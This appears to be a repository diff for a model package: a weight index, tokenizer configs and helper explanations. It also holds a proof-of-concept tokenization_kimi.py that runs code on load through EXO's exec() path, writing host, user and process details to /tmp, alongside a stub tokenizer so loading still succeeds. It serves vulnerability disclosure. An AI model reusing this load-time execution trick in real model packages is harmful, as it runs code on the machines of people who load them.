    "model.layers.27.input_layernorm.weight": "model.safetensors",
    "model.layers.27.mlp.down_proj.weight": "model.safetensors",
    "model.layers.27.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.27.mlp.up_proj.weight": "model.safetensors",
    "model.layers.27.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.27.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.27.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.27.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.27.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.28.input_layernorm.weight": "model.safetensors",
    "model.layers.28.mlp.down_proj.weight": "model.safetensors",
    "model.layers.28.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.28.mlp.up_proj.weight": "model.safetensors",
    "model.layers.28.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.28.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.28.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.28.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.28.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.29.input_layernorm.weight": "model.safetensors",
    "model.layers.29.mlp.down_proj.weight": "model.safetensors",
    "model.layers.29.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.29.mlp.up_proj.weight": "model.safetensors",
    "model.layers.29.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.29.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.29.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.29.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.29.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.3.input_layernorm.weight": "model.safetensors",
    "model.layers.3.mlp.down_proj.weight": "model.safetensors",
    "model.layers.3.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.3.mlp.up_proj.weight": "model.safetensors",
    "model.layers.3.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.3.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.3.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.3.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.3.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.4.input_layernorm.weight": "model.safetensors",
    "model.layers.4.mlp.down_proj.weight": "model.safetensors",
    "model.layers.4.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.4.mlp.up_proj.weight": "model.safetensors",
    "model.layers.4.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.4.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.4.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.4.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.4.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.5.input_layernorm.weight": "model.safetensors",
    "model.layers.5.mlp.down_proj.weight": "model.safetensors",
    "model.layers.5.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.5.mlp.up_proj.weight": "model.safetensors",
    "model.layers.5.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.5.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.5.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.5.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.5.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.6.input_layernorm.weight": "model.safetensors",
    "model.layers.6.mlp.down_proj.weight": "model.safetensors",
    "model.layers.6.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.6.mlp.up_proj.weight": "model.safetensors",
    "model.layers.6.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.6.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.6.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.6.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.6.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.7.input_layernorm.weight": "model.safetensors",
    "model.layers.7.mlp.down_proj.weight": "model.safetensors",
    "model.layers.7.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.7.mlp.up_proj.weight": "model.safetensors",
    "model.layers.7.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.7.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.7.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.7.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.7.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.8.input_layernorm.weight": "model.safetensors",
    "model.layers.8.mlp.down_proj.weight": "model.safetensors",
    "model.layers.8.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.8.mlp.up_proj.weight": "model.safetensors",
    "model.layers.8.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.8.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.8.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.8.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.8.self_attn.v_proj.weight": "model.safetensors",
    "model.layers.9.input_layernorm.weight": "model.safetensors",
    "model.layers.9.mlp.down_proj.weight": "model.safetensors",
    "model.layers.9.mlp.gate_proj.weight": "model.safetensors",
    "model.layers.9.mlp.up_proj.weight": "model.safetensors",
    "model.layers.9.post_attention_layernorm.weight": "model.safetensors",
    "model.layers.9.self_attn.k_proj.weight": "model.safetensors",
    "model.layers.9.self_attn.o_proj.weight": "model.safetensors",
    "model.layers.9.self_attn.q_proj.weight": "model.safetensors",
    "model.layers.9.self_attn.v_proj.weight": "model.safetensors",
    "model.norm.weight": "model.safetensors"
  }
}
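Loaders use `weight_map` to find which file holds each tensor. Here every tensor lives in the single `model.safetensors`. The keys are sorted as strings, which is why layer 10 appears before layer 2. The small sketch below lists the shard files to fetch and counts tensors per decoder layer. The helper names are hypothetical, and the inline `example` index is a trimmed stand-in for the real file.

```python
import json
from collections import Counter


def load_index(path):
    """Read a *.safetensors.index.json file from disk."""
    with open(path) as f:
        return json.load(f)


def shard_files(index):
    """Distinct checkpoint files referenced by the weight map."""
    return sorted(set(index["weight_map"].values()))


def tensors_per_layer(index):
    """Count tensors under each 'model.layers.<n>.' prefix, keyed by layer number."""
    counts = Counter()
    for name in index["weight_map"]:
        parts = name.split(".")
        if parts[:2] == ["model", "layers"]:
            counts[int(parts[2])] += 1
    return counts


example = {
    "metadata": {"total_size": 0},
    "weight_map": {
        "model.embed_tokens.weight": "model.safetensors",
        "model.layers.0.input_layernorm.weight": "model.safetensors",
        "model.layers.10.mlp.down_proj.weight": "model.safetensors",
        "model.layers.2.mlp.up_proj.weight": "model.safetensors",
        "model.norm.weight": "model.safetensors",
    },
}
print(shard_files(example))
print(sorted(tensors_per_layer(example).items()))
```

For the full index above, `shard_files` returns `['model.safetensors']`. Each of layers 0 to 29 has 9 tensors: four attention projections, three MLP projections, and two RMSNorm weights. With the embedding and final norm, that makes 272 entries.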
special_tokens_map.json (Normal file, 34 lines)
@@ -0,0 +1,34 @@
{
  "additional_special_tokens": [
    "<|im_start|>",
    "<|im_end|>"
  ],
  "bos_token": {
    "content": "<|im_start|>",
    "lstrip": false,
    "normalized": false,
    "rstrip": false,
    "single_word": false
  },
  "eos_token": {
    "content": "<|im_end|>",
    "lstrip": false,
    "normalized": false,
    "rstrip": false,
    "single_word": false
  },
  "pad_token": {
    "content": "<|im_end|>",
    "lstrip": false,
    "normalized": false,
    "rstrip": false,
    "single_word": false
  },
  "unk_token": {
    "content": "<|endoftext|>",
    "lstrip": false,
    "normalized": false,
    "rstrip": false,
    "single_word": false
  }
}
|
||||
80
tokenization_kimi.py
Normal file
80
tokenization_kimi.py
Normal file
@@ -0,0 +1,80 @@
# tokenization_kimi.py - Safe PoC stub
# This file is executed via exec() by EXO when loading a model whose ID contains "kimi-k2".
# It demonstrates arbitrary code execution by writing a marker file, then provides
# the TikTokenTokenizer class that EXO expects.

import os
import sys
from pathlib import Path

# ============================================================================
# PoC PAYLOAD - executes at module load time (when EXO calls exec() on this file)
# ============================================================================
POC_MARKER_FILE = "/tmp/exo_poc_marker.txt"


def execute_payload():
    """
    Proof-of-execution: writes a marker file with basic context info.
    Non-destructive — only creates one small file under /tmp.
    """
    try:
        content = (
            "=== EXO RCE PoC - Code Execution Confirmed ===\n"
            f"Hostname: {os.uname().nodename}\n"
            f"User: {os.getenv('USER', 'unknown')}\n"
            f"PID: {os.getpid()}\n"
            f"Python: {sys.executable}\n"
            f"CWD: {os.getcwd()}\n"
        )
        Path(POC_MARKER_FILE).write_text(content)
        print(f"[PoC] tokenization_kimi executed — marker written to {POC_MARKER_FILE}")
    except Exception as exc:
        print(f"[PoC] Could not write marker file: {exc}")


execute_payload()

# ============================================================================
# STUB TOKENIZER CLASS — required by EXO's load_tokenizer_for_model_id()
# EXO calls:
# hf_tokenizer = TikTokenTokenizer.from_pretrained(model_path)
# hf_tokenizer.encode = _patched_encode (uses hf_tokenizer.model.encode)
# So we need a .model attribute that has an .encode() method.
# ============================================================================


class _InnerModel:
    """Minimal inner model that satisfies EXO's patched encode path."""

    def encode(self, text: str, allowed_special=None) -> list:
        return [ord(c) % 128 for c in (text or "")]

    def decode(self, tokens, errors="replace") -> str:
        return "".join(chr(t % 128) for t in tokens)


class TikTokenTokenizer:
    """
    Stub TikTokenTokenizer to satisfy EXO's tokenizer loading expectations.
    The PoC payload has already executed by the time this class is instantiated.
    """

    def __init__(self, *args, **kwargs):
        self.model = _InnerModel()
        self.eos_token_id = 151643  # <|im_end|> in real Kimi vocab
        self.bos_token_id = 151644
        self.pad_token_id = 151643
        self.eos_token = "<|im_end|>"
        self.bos_token = "<|im_start|>"
        print("[PoC] TikTokenTokenizer stub initialised")

    @classmethod
    def from_pretrained(cls, model_path, **kwargs):
        print(f"[PoC] TikTokenTokenizer.from_pretrained called with: {model_path}")
        return cls()

    def encode(self, text: str, **kwargs) -> list:
        return self.model.encode(text)

    def decode(self, tokens, **kwargs) -> str:
        return self.model.decode(tokens)


print("[PoC] tokenization_kimi.py loaded successfully")
98249
tokenizer.json
Normal file
File diff suppressed because it is too large
154
tokenizer_config.json
Normal file
@@ -0,0 +1,154 @@
{
  "add_prefix_space": false,
  "added_tokens_decoder": {
    "0": {
      "content": "<|endoftext|>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "1": {
      "content": "<|im_start|>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "2": {
      "content": "<|im_end|>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "3": {
      "content": "<repo_name>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "4": {
      "content": "<reponame>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "5": {
      "content": "<file_sep>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "6": {
      "content": "<filename>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "7": {
      "content": "<gh_stars>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "8": {
      "content": "<issue_start>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "9": {
      "content": "<issue_comment>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "10": {
      "content": "<issue_closed>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "11": {
      "content": "<jupyter_start>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "12": {
      "content": "<jupyter_text>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "13": {
      "content": "<jupyter_code>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "14": {
      "content": "<jupyter_output>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "15": {
      "content": "<jupyter_script>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    },
    "16": {
      "content": "<empty_output>",
      "lstrip": false,
      "normalized": false,
      "rstrip": false,
      "single_word": false,
      "special": true
    }
  },
  "additional_special_tokens": [
    "<|im_start|>",
    "<|im_end|>"
  ],
  "bos_token": "<|im_start|>",
  "chat_template": "{% for message in messages %}{% if loop.first and messages[0]['role'] != 'system' %}{{ '<|im_start|>system\nYou are a helpful AI assistant named SmolLM, trained by Hugging Face<|im_end|>\n' }}{% endif %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n'}}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}",
  "clean_up_tokenization_spaces": false,
  "eos_token": "<|im_end|>",
  "model_max_length": 8192,
  "pad_token": "<|im_end|>",
  "tokenizer_class": "GPT2Tokenizer",
  "unk_token": "<|endoftext|>",
  "vocab_size": 49152
}
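The `chat_template` in `tokenizer_config.json` is a ChatML-style Jinja template: when the first message is not from `system` it prepends a default system turn (which names SmolLM), wraps every message as `<|im_start|>{role}\n{content}<|im_end|>\n`, and optionally opens an assistant turn. The following is a minimal standard-library sketch that mirrors that logic in plain Python, assuming messages are dicts with `role` and `content` keys. `render_chat` is a hypothetical name; in practice the template is rendered by Jinja, for example through `apply_chat_template` in `transformers`.

```python
DEFAULT_SYSTEM = (
    "<|im_start|>system\n"
    "You are a helpful AI assistant named SmolLM, trained by Hugging Face<|im_end|>\n"
)


def render_chat(messages, add_generation_prompt=False):
    """Hypothetical plain-Python mirror of the Jinja chat_template above."""
    parts = []
    for i, message in enumerate(messages):
        # Mirrors `loop.first and messages[0]['role'] != 'system'`.
        if i == 0 and messages[0]["role"] != "system":
            parts.append(DEFAULT_SYSTEM)
        parts.append(
            "<|im_start|>" + message["role"] + "\n" + message["content"] + "<|im_end|>\n"
        )
    # Open an assistant turn so a model can continue from here.
    if add_generation_prompt:
        parts.append("<|im_start|>assistant\n")
    return "".join(parts)


prompt = render_chat([{"role": "user", "content": "Hi"}], add_generation_prompt=True)
print(prompt)
```

Because the default system turn is injected only inside the loop, an empty message list yields just the assistant header, matching the Jinja behaviour.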
25
tool_declaration_ts.py
Normal file
@@ -0,0 +1,25 @@
# tool_declaration_ts.py - Stub for Kimi tool/function-calling support
# Loaded by EXO via importlib before tokenization_kimi.py is exec()'d.
# Must exist to prevent ImportError in tokenization_kimi.py relative-import path.

"""
Minimal tool-declaration stub for the Kimi tokenizer PoC.
The real Kimi model uses this module for tool/function-call schema support.
"""

# Stub constants expected by some tokenization_kimi variants
TOOL_CALL_START = "<|tool_call_begin|>"
TOOL_CALL_END = "<|tool_call_end|>"
TOOL_CALL_ARG_BEGIN = "<|tool_call_argument_begin|>"


def build_tool_declaration(name: str, description: str = "", params: dict = None) -> dict:
    """Stub — returns a minimal tool declaration dict."""
    return {
        "name": name,
        "description": description,
        "parameters": params or {},
    }


print("[PoC] tool_declaration_ts.py stub loaded")
BIN
train_graph.png
Normal file
Binary file not shown.
Size: 58 KiB
237139
train_info.json
Normal file
File diff suppressed because one or more lines are too long
1
vocab.json
Normal file
File diff suppressed because one or more lines are too long